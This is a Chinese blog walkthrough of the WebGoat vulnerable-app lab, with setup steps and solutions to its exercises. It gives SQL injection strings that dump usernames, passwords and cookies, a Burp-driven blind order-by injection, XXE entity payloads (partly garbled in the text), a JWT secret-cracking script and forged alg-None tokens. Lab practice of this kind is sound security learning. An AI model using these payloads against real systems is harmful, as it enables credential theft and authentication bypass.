本文共 7377 字，大约阅读时间需要 24 分钟。

---

前言

搭建WebGoat靶场，以前没玩过这个，涉及的知识挺多的，没事打一打。

---

一、搭建靶场

靶场环境，只介绍在windows系统中搭建过程。

先下载这两个文件

由于是github的项目，下载时，可能因为网络问题而失败，所以建议用迅雷下载。

然后在放到一个专门文件夹内(本人轻微强迫症哈哈，可以随意放)

执行下面两条命令就可以了

java -jar webgoat-server-8.0.0.M17.jarjava -jar webwolf-8.0.0.M17.jar

访问就可以了。 注册账号随便弄一个就可以了。 补充一个坑，可能会遇到的一个问题

就是搭建好靶场后没什么问题，第二次进入的问题。(免得像我一样的小白不知道而再去重新搭建，浪费时间)

先描述一下问题：就是访问http://127.0.0.1:8080时浏览器返回找不到网页了，没有进入到靶场环境。附图如下：

这个不是靶场出问题了，而是不是第一次进入靶场，原来已经进入过并注册了用户名和密码了，就要进入登录界面直接登录了。所以环境没问题。

解决办法也很简单：访问这个——，webwolf也是同理。就不多嘴了哈。

二、通关攻略

Introduction的部分就是检查靶场功能。看不懂英文的话，建议用翻译插件翻译一下。

1.General

HTTP Basics

第二关

就是输入用户名就可以了，放一张图。

第三关

提示是需要使用Owasp zap进行抓包查看，这里使用burp进行

将1改为6放包，然后答题正确。

HTTP Proxies

第六关

前面的都是一款工具的教程，叫做Owasp zap、可以做代理，同时还是一个漏洞扫描工具，我抓包一般不用它，所以前面的看看就行直接绕过。还是使用burp来抓包。漏扫的话可以了解一下，免费的软件。

过关有点坑，直接抓取数据包，按照修改题目要求。

坑：直接修改changeme，怎么都是不对的，因为修改为get请求了，所以提交参数的方式就应该是get方式，要在URL里面进行提交。坑的话就这一点。按照下图的方式修改就可以了。

反思：第一次没有想到get请求改变后的变化，想的不够充分。现在想想，题目怎么可能就是让改一下参数呢？那如果这样，它设置这个要求的目的在哪，所以想的时候还是想想为什么会有这个要求。

2.Injection Flaws

SQL Injection (advanced)

第三关

SQL注入，查看到前两小节的知识，了解到是使用联合查询进行注入。

这个很重要，后面会用到，注意userid的类型

先尝试单引号闭合。

' or 1=1 --

尝试单引号闭合成功，且查询到了，WebGoat表中的内容，

union查询的特性就是上下两个SQL 语句所产生的栏位需要是同样的资料种类，所以观察刚刚查询出来的列数，了解到有七列，所以接下来要写在union后的SQL语句也必须要列出7列才行，因为已经知道user_system_data这个数据表中的前4列了，所以剩下的3列随便填点什么就行，需要注意的是，数据类型也必须一致。

' union select 1,user_name,password,'hello','bye',cookie,1 from user_system_data --

这里注意userid是字符串类型而不是int类型，前面提示过了，看上面的图。

还有一种方法：

直接查询全部内容

'; select * from user_system_data --

最后将结果输入第二个框里就过关

---

第五关 能力有限，暂时没有解出。

---

SQL Injection

第七关

字符类型的SQL注入，通过Smith可以查看一位用户的数据

测试，发现确实是存在注入的。

Smith' or 1=1 --

而日是POST方式的SQL注入，简单单的类型，直接sqlmap跑一下。 步骤：抓包，复制数据包内容，写入一个文件中。然后使用sqlmap直接获取数据库等信息。 第八关

数字类型的SQL注入，通过101可以查看一位用户的数据

101 or 1=1 --

同上。

SQL Injection (mitigation)

这一关需要使用order by 找出IP address webgoat-prd server

排序是按照下面的这几个来排的。

开启代理，点击进行抓包。 可以看到是返回正常的页面了，因为它column是按照hostname来排序的，但是如果将它改一下

GET /WebGoat/SqlInjection/servers?column=m0re HTTP/1.1

然后go，就会发现它是返回错误的

Whitelabel Error Page
This application has no explicit mapping for /error, so you are seeing this as afallback.
   
    Sat Aug 15 21:38:51 CST 2020
   
   
    There was an unexpected error (type=Internal Server Error, status=500).
   
   
    user lacks privilege or object not found: M0RE in statement [select id, hostname, ip, mac, status, description from servers  where status <> 'out of order' order by m0re]
   

可以看到order by的参数是m0re，是刚才传入的。然后看返回的报错中id, hostname, ip, mac, status, description这几个都是可以进行排列的参数，表是servers但是有一个没见过就是status，所以servers中的status列中的数据才是webgoat-prd 的服务器的IP地址。

GET /WebGoat/SqlInjection/servers?column=case%20when%20(substring((select%20ip%20from%20servers%20where%20hostname=%27webgoat-prd%27),1,1)=%271%27)%20then%20id%20else%20description%20end HTTP/1.1

这个是需要进行

抓取到发送到intruder模块进行爆破。

构造payload，选择爆破方式为Cluster bomb

case%20when%20(substring((select%20ip%20from%20servers%20where%20hostname=%27webgoat-prd%27),§1§,1)=%27§2§%27)%20then%20id%20else%20description%20end

再设置payload，第一个payload设置最大为15因为IP地址一般是xxx.xxx.xxx.xxx算上“点”正好15位。第二个payload设置为9，数字(0—9)不过我设置的时候忘了加0了，所以没有的情况就是0了，这个无碍。。

然后开始爆破，完成后手动进行设置comment做一个标记，按照id来排序的，设置个标记(这里使用yes，什么标记都行) 筛选一下，只查看有标记的记录。勾选。就可以看到了 这就是所有的了，然后IP地址读取很明显了，直接看着写出来就行 怎么看IP，举个栗子

方法：比如第一个，看两个payload，第一个是1，第二个是1，则IP地址的第一个是1

第二个，没有找到第一个payload是2的，所以就是0了。

第三个是4

第四个，上面没有，也就是"点"的位置。

这样就可以得出IP地址的前三位了104.后面的不再啰嗦。

总：104.130.219.202

---

XXE

XXE漏洞的基础知识，可以参考我之前的学习博客——🔑

第三关

随便提交了一个评论，没发现什么异常的，然后就是在评论区显示出来。

尝试抓包查看，发现了XML

直接构造简单的XML来提交

   
   ]>
     
    
     &m0re;
    
   

因为我是在windows系统中搭建的环境，所以读取C盘内容

如果是linux系统的话，就使用file:/// 第四关 这次抓到的包是这样的

有一点是，这个Content-Type是json，上一题是XML，所以把这里进行一下修改，就可以，然后XML实体就使用上一题的就可以

发包，成功 第七关Blind XXE assignment

在webwolf上传外部XML文件m0re.dtd

   ">

然后抓包修改，请求利用这个外部XML

payload如下：

   
   %zxcv;%payload;]>
     
    
     &m0re;
    
   

解释：因为我的是windows系统来搭建的，中间除了一点小差错，是jdk版本的原因，导致靶场无法访问，所以我又换了一个版本相对较低的靶场。这个webwolf的默认端口是8081，所以payload里面是8081。

http://127.0.0.1:8081/files/webgoat/m0re.dtd这个路径是http://127.0.0.1:8081/files/{username}/{filename}，其他的也没什么了。

blind XXE就是没有回显的，所以去webwolf中查就是了。

显示的内容需要进行URL解码后提交评论。

3.Authentication Flaws

Authentication Bypasses

身份验证缺陷——看完前面lesson去做第一关不难，只需要进行尝试删除或者修改参数就可以了。这里是进行了修改，删除没有成功。

JWT tokens

关于JWT tokens，之前好像是isCC有这么一道题，涉及的这个知识。之前题目是被不知名大佬搞坏了，所以没能复现成功，这次正好学习一下。

尝试更改收到的token并通过更改token成为管理员用户。

token的组成，三部分：Header、Claims、Signature

而且token是经过base64编码过的。

用户获取token需要经过下面这一系列步骤：

用户输入用户名和密码，提交登录信息给服务器，然后创建一个JWT返回给浏览器，浏览器将token发送到授权的Header头中，服务器检验token的值，从token中验明用户身份信息，验证身份后就会返回给用户相应的信息。

第四关

这一关，可能是环境的问题，抓包获取可能存在问题，抓取的数据包没有发现token，建议搭建环境还是去linux系统或者使用docker进行搭建吧。

这里说一下方法和知识点。

抓取到数据包后分别对token的三个部分进行base64解码，Header部分后面的是加密算法，可将其改为none

也就是图中部分

在第二部分查看到与admin相关的部分，然后就是将它的参数修改一下。这种类型的题目是JWT中的基础部分，只需要修改token的值就可以了。

然后复制回burp中，进行发包。思路大概就是这个样子。

第五关

JWT cracking——爆破，需要使用python脚本进行爆破，前提需自备字典。字典够强，就可以跑出来——

可以用我现在用的这个试试。测试呢嘛，就直接在源码里找到密码插进去就行。

python脚本——来自freebuf大佬阿信

import termcolorimport jwtif __name__ == "__main__":    jwt_str = R'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0'    with open('C:\\Users\\18101\\Desktop\\m0re.txt') as f:        for line in f:            key_ = line.strip()            try:                jwt.decode(jwt_str, verify=True, key=key_)                print('\r', '\bfound it -->', termcolor.colored(key_, 'green'), '<--')                break            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):                print('\r', '\bfound it -->', termcolor.colored(key_, 'green'), '<--')                break            except jwt.exceptions.InvalidSignatureError:                print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)                continue        else:            print('\r', '\bsorry! nothing be found.')

可能存在的错误：就是需要导入两个模块，分别是termcolor和jwt

这里有个坑就是，模块安装完后，还是会报错

module 'jwt' has no attribute 'decode'

查阅资料了解到python的模块中有jwt和pyjwt两个模块都是引用的jwt，其实不一样，这里使用的是pyjwt所以再安装pyjwt这个模块就好了。

运行结果：

记得将username处的tom改为WebGoat，下面的victory也填入。

复制到提交处，就可以了。(PS：但是我的环境可能是很有问题的，重新搭建好几遍了，还是答案不对)

可以参考一下这位师傅的博客，过程没问题，就是答案提交了不正确。也不纠结了。pass！参考链接——

第七关Refreshing a token

点击这里查看日志。

在日志文件中发现历史记录的token，也就是过期的，和提交页面的URL，如下： 解码这个token，然后发现缺少了typ，既然是已经过期了的，那么时间肯定是不合适的。查阅资料了解到token的时间设定

其中iat是token生成的时间，exp是token失效的时间，也就是直接改exp就行了。这个时间是根据1970计算机的时间纪元来计算的，也就是得知道当前的时间是多少，

回到主页面，其中除了checkout，其他的点击了都是没有其他效果的。

所以就只能选择在这个地方入手了。 思路：抓包，修改token。

返回不是用户tom，所以还是用到那个过期的token，但是日期是不正确的， 所以需要获取当前时间，然后进行编码。 时间获取：

import timeprint(time.time())

将这个时间加长一点。就可以变为有效期的token了。因为原本的token默认使用HS512来hash，还需要secret值，爆破方式上一关的脚本可以。然后再进行base64编码。 懒得爆破了，所以就学习知乎大师傅的方法，直接将不hash，直接将alg改为None。然后进行base64编码。后面的签名也可以不加，直接下面两种组合，构成payload。

{
   "alg":"None"}==>eyJhbGciOiJOb25lIn0={
   "iat":1526131411,"exp":1597757030,"admin":"false","user":"Tom"}==>eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTU5Nzc1NzAzMCwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ==

提交的payload

eyJhbGciOiJOb25lIn0=.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTU5Nzc1NzAzMCwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ==.

不要忘记了最后的“点”，那是分割符。

复制token，粘贴到

可以看到返回成功了，浏览器中也显示过关。

第八关Final challenges 参考上一关，方法一样。能做出来。 首先抓包，在这个位置找到token，然后去修改就可以了。 发包，成功。

---

总结

这个靶场确实很好，综合漏洞靶场，学到了许多知识，先记录一部分，后面再另写一篇。继续加油。

转载地址：https://blog.csdn.net/qq_45836474/article/details/108021657 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！